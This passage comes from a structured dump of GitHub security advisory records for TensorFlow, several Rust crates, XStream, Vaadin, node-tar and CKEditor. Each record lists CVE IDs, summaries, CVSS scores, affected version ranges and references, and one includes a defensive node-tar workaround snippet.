'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wp77-4gmm-7cq8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37648'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9728c60e136912a12d99ca56e106b7cce7af5986'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T21:12:17Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-vpw8-43wm-rxw5,2021-08-19T17:21:10Z,2021-08-25T20:54:06Z,,['CVE-2021-29929'],Double free in endian_trait,An issue was discovered in the endian_trait crate through 2021-01-04 for Rust. A double drop can occur when a user-provided Endian impl panics.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'endian_trait'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29929'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/myrrlyn/endian_trait'}, {'type': 'WEB', 'url': 'https://gitlab.com/myrrlyn/endian_trait/-/issues/1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0039.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:21:10Z', 'nvd_published_at': None}" +1.4.0,GHSA-w5cr-frph-hw7f,2021-05-25T20:52:53Z,2021-08-25T21:01:50Z,,['CVE-2021-31919'],Use of uninitialized buffer in rkyv,"An issue was discovered in the rkyv crate before 0.6.0 for Rust. When an archive is created via serialization, the archive content may contain uninitialized values of certain parts of a struct.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rkyv'}, 'ecosystem_specific': {'affected_functions': ['rkyv::Archive::resolve']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31919'}, {'type': 'WEB', 'url': 'https://github.com/djkoloski/rkyv/issues/113'}, {'type': 'WEB', 'url': 'https://github.com/djkoloski/rkyv/commit/9c65ae9c2c67dd949b5c3aba9b8eba6da802ab7e'}, {'type': 'WEB', 'url': 'https://github.com/djkoloski/rkyv/commit/f141b560523a20557db6540576d153010bd18712'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0054.html'}]","{'cwe_ids': ['CWE-772', 'CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:52:53Z', 'nvd_published_at': '2021-04-30T03:15:00Z'}" +1.4.0,GHSA-g5w6-mrj7-75h2,2022-02-08T20:58:58Z,2021-08-25T14:48:31Z,,['CVE-2021-39141'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39141](https://x-stream.github.io/CVE-2021-39141.html). + +### Credits +Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39141'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39141.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:04Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-qcc4-3rxf-gf4m,2021-09-03T20:35:31Z,2021-08-30T16:16:38Z,,['CVE-2021-33605'],Unauthorized property update in CheckboxGroup component in Vaadin 12-14 and 15-20,"Improper check in `CheckboxGroup` in `com.vaadin:vaadin-checkbox-flow` versions 1.2.0 prior to 2.0.0 (Vaadin 12.0.0 prior to 14.0.0), 2.0.0 prior to 3.0.0 (Vaadin 14.0.0 prior to 14.5.0), 3.0.0 through 4.0.1 (Vaadin 15.0.0 through 17.0.11), 14.5.0 through 14.6.7 (Vaadin 14.5.0 through 14.6.7), and 18.0.0 through 20.0.5 (Vaadin 18.0.0 through 20.0.5) allows attackers to modify the value of a disabled `Checkbox` inside enabled `CheckboxGroup` component via unspecified vectors. + +- https://vaadin.com/security/cve-2021-33605","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-checkbox-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '14.6.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-checkbox-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '20.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/security/advisories/GHSA-qcc4-3rxf-gf4m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33605'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/pull/1903'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/commit/1aa6bc94c763023bc3fc5849c2a1e8cab3bf6766'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/commit/f136532a735f703f1144f19fee48c9009c659f03'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow-components'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33605'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T16:15:42Z', 'nvd_published_at': '2021-08-25T13:15:00Z'}" +1.4.0,GHSA-7v2r-wxmg-mgvc,2023-06-13T21:49:09Z,2021-08-25T20:48:56Z,,['CVE-2020-35884'],HTTP Request smuggling in tiny_http,"HTTP pipelining issues and request smuggling attacks are possible due to incorrect Transfer encoding header parsing. It is possible conduct HTTP request smuggling attacks (CL:TE/TE:TE) by sending invalid Transfer Encoding headers. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tiny_http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35884'}, {'type': 'WEB', 'url': 'https://github.com/tiny-http/tiny-http/issues/173'}, {'type': 'WEB', 'url': 'https://github.com/tiny-http/tiny-http/pull/190'}, {'type': 'WEB', 'url': 'https://github.com/tiny-http/tiny-http/commit/623b87397a569729c4bcabae747823c5668cce94'}, {'type': 'PACKAGE', 'url': 'https://github.com/tiny-http/tiny-http'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M3JDNRE5RXJOWZZZF5QSCG4GUCSLTHF2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VO6SRTCEPEYO2OX647I3H5XUWLFDRDWL/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0031.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:20Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-wr55-mf5c-hhwm,2023-06-13T18:16:02Z,2021-08-25T20:50:44Z,,['CVE-2020-36209'],Data races in late-static,"Affected versions of this crate implemented Sync for LateStatic with T: Send, so that it is possible to create a data race to a type T: Send + !Sync (e.g. Cell). + +This can result in a memory corruption or other kinds of undefined behavior. + +The flaw was corrected in commit 11f396c by replacing the T: Send bound to T: Sync bound in the Sync impl for LateStatic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'late-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36209'}, {'type': 'WEB', 'url': 'https://github.com/Richard-W/late-static/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/Richard-W/late-static/commit/11f396c'}, {'type': 'PACKAGE', 'url': 'https://github.com/Richard-W/late-static'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0102.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:52:13Z', 'nvd_published_at': None}" +1.4.0,GHSA-vqx7-pw4r-29rr,2021-08-19T21:18:29Z,2021-08-25T20:47:13Z,,['CVE-2020-35861'],Out of bounds read in bumpalo,An issue was discovered in the bumpalo crate before 3.2.1 for Rust. The realloc feature allows the reading of unknown memory. Attackers can potentially read cryptographic keys.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bumpalo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35861'}, {'type': 'WEB', 'url': 'https://github.com/fitzgen/bumpalo/issues/69'}, {'type': 'PACKAGE', 'url': 'https://github.com/fitzgen/bumpalo'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0006.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:29Z', 'nvd_published_at': None}" +1.4.0,GHSA-q89x-f52w-6hj2,2023-06-13T17:39:45Z,2021-08-25T20:43:04Z,,['CVE-2017-18587'],Headers containing newline characters can split messages in hyper,"Serializing of headers to the socket did not filter the values for newline bytes (\r or \n), which allowed for header values to split a request or response. People would not likely include newlines in the headers in their own applications, so the way for most people to exploit this is if an application constructs headers based on unsanitized user input. + +This issue was fixed by replacing all newline characters with a space during serialization of a header value.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18587'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/wiki/Security-001'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2017-0002.html'}]","{'cwe_ids': ['CWE-93'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:19Z', 'nvd_published_at': '2019-08-26T13:15:00Z'}" +1.4.0,GHSA-mm7v-vpv8-xfc3,2023-06-13T20:57:37Z,2021-08-25T20:44:59Z,,['CVE-2019-15551'],Double free in smallvec,Attempting to call grow on a spilled SmallVec with a value equal to the current capacity causes it to free the existing data. This performs a double free immediately and may lead to use-after-free on subsequent accesses to the SmallVec contents. An attacker that controls the value passed to grow may exploit this flaw to obtain memory contents or gain remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'smallvec'}, 'ecosystem_specific': {'affected_functions': ['smallvec::SmallVec::grow']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.5'}, {'fixed': '0.6.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15551'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/issues/148'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/issues/149'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/commit/c20cfa8584e649f00dc0767ab6fad63a3f59a296'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/commit/f96322b9243405cc82701cc73f1b19313b413ab4'}, {'type': 'PACKAGE', 'url': 'https://github.com/servo/rust-smallvec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0009.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:23Z', 'nvd_published_at': None}" +1.4.0,GHSA-qq89-hq3f-393p,2021-08-31T16:02:04Z,2021-08-31T16:05:17Z,,['CVE-2021-37712'],Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links,"### Impact +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. + +This logic was insufficient when extracting tar files that contained two directories and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 ""short path"" counterparts. A specially crafted tar archive could thus include directories with two forms of the path that resolve to the same file system entity, followed by a symbolic link with a name in the first form, lastly followed by a file using the second form. It led to bypassing node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. + +The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below. + +### Patches + +6.1.9 || 5.0.10 || 4.4.18 + +### Workarounds + +Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links. + +```js +const tar = require('tar') + +tar.x({ + file: 'archive.tgz', + filter: (file, entry) => { + if (entry.type === 'SymbolicLink') { + return false + } else { + return true + } + } +}) +``` + +Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves. + +#### Fix + +The problem is addressed in the following ways, when comparing paths in the directory cache and path reservation systems: + +1. The `String.normalize('NFKD')` method is used to first normalize all unicode to its maximally compatible and multi-code-point form. +2. All slashes are normalized to `/` on Windows systems (on posix systems, `\` is a valid filename character, and thus left intact). +3. When a symbolic link is encountered on Windows systems, the entire directory cache is cleared. Collisions related to use of 8.3 short names to replace directories with other (non-symlink) types of entries may make archives fail to extract properly, but will not result in arbitrary file writes. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.18'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37712'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455'}, {'type': 'WEB', 'url': 'https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/node-tar'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5008'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/tar'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:02:04Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}" +1.4.0,GHSA-fqq2-xp7m-xvm8,2021-08-24T17:45:32Z,2021-08-25T20:58:19Z,,['CVE-2020-36435'],Data race in ruspiro-singleton,"`Singleton` is meant to be a static object that can be initialized lazily. In +order to satisfy the requirement that `static` items must implement `Sync`, +`Singleton` implemented both `Sync` and `Send` unconditionally. + +This allows for a bug where non-`Sync` types such as `Cell` can be used in +singletons and cause data races in concurrent programs. + +The flaw was corrected in commit `b0d2bd20e` by adding trait bounds, requiring +the contaiend type to implement `Sync`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ruspiro-singleton'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36435'}, {'type': 'WEB', 'url': 'https://github.com/RusPiRo/ruspiro-singleton/issues/10'}, {'type': 'WEB', 'url': 'https://github.com/RusPiRo/ruspiro-singleton/pull/11'}, {'type': 'WEB', 'url': 'https://github.com/RusPiRo/ruspiro-singleton/commit/b0d2bd20eb40b9cbc2958b981ba2dcd9e6f9396e'}, {'type': 'PACKAGE', 'url': 'https://github.com/RusPiRo/ruspiro-singleton'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/ruspiro-singleton/RUSTSEC-2020-0115.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0115.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:14:26Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-gvvv-w559-2hg6,2021-08-24T17:59:17Z,2021-08-25T20:57:17Z,,['CVE-2020-36453'],Data races in scottqueue,"An issue was discovered in the scottqueue crate through 2020-11-15 for Rust. There are unconditional implementations of Send and Sync for Queue. This allows (1) creating data races to a `T: !Sync` and (2) sending `T: !Send` to other threads, resulting in memory corruption or other undefined behavior. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'scottqueue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36453'}, {'type': 'WEB', 'url': 'https://github.com/rossdylan/rust-scottqueue/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/rossdylan/rust-scottqueue'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0133.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:26:07Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-4wj3-p7hj-cvx8,2023-06-13T20:13:30Z,2021-08-25T20:48:47Z,,['CVE-2020-35891'],Double free in ordnung,An issue was discovered in the ordnung crate through version 0.0.1 for Rust. compact::Vec violates memory safety via a remove() double free.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ordnung'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35891'}, {'type': 'WEB', 'url': 'https://github.com/maciejhirsz/ordnung/issues/8'}, {'type': 'PACKAGE', 'url': 'https://github.com/maciejhirsz/ordnung'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0038.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-rpxm-vmr7-5f5f,2021-08-24T18:24:04Z,2021-08-25T20:59:15Z,,['CVE-2020-36445'],Data races in convec,"Affected versions of this crate unconditionally implement Send/Sync for `ConVec`. +This allows users to insert `T` that is not Send or not Sync. + +This allows users to create data races by using non-Send types like `Arc>` or `Rc<_>` as `T` in `ConVec`. It is also possible to create data races by using types like `Cell<_>` or `RefCell<_>` as `T` (types that are `Send` but not `Sync`). +Such data races can lead to memory corruption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'convec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36445'}, {'type': 'PACKAGE', 'url': 'https://github.com/krl/convec'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/convec/RUSTSEC-2020-0125.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0125.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:35:28Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-vp6r-mrq9-8f4h,2023-06-13T21:50:03Z,2021-08-25T20:58:11Z,,['CVE-2020-36462'],Data race in syncpool,Affected versions of this crate unconditionally implements Send for Bucket2. This allows sending non-Send types to other threads. This can lead to data races when non Send types like Cell or Rc are contained inside Bucket2 and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). The flaw was corrected in commit `15b2828` by adding a T: Send bound to the Send impl of Bucket2.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'syncpool'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36462'}, {'type': 'WEB', 'url': 'https://github.com/Chopinsky/byte_buffer/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/Chopinsky/byte_buffer/commit/15b282877d1e576de2b337d8162bbf43ed1a0f2d'}, {'type': 'PACKAGE', 'url': 'https://github.com/Chopinsky/byte_buffer/tree/master/syncpool'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/syncpool/RUSTSEC-2020-0142.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0142.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:18:30Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-6226-h7ff-ch6c,2022-02-08T21:01:57Z,2021-08-23T19:40:48Z,,['CVE-2021-32808'],Widget feature vulnerability allowing to execute JavaScript code using undo functionality,"### Affected packages +The vulnerability has been discovered in [Widget](https://ckeditor.com/cke4/addon/clipboard) plugin if used alongside [Undo](https://ckeditor.com/cke4/addon/undo) feature. + +### Impact +A potential vulnerability has been discovered in CKEditor 4 [Widget](https://ckeditor.com/cke4/addon/widget) package. The vulnerability allowed to abuse undo functionality using malformed widget HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version >= 4.13.0. + +### Patches +The problem has been recognized and patched. The fix will be available in version 4.16.2. + +### For more information +Email us at security@cksource.com if you have any questions or comments about this advisory. + +### Acknowledgements +The 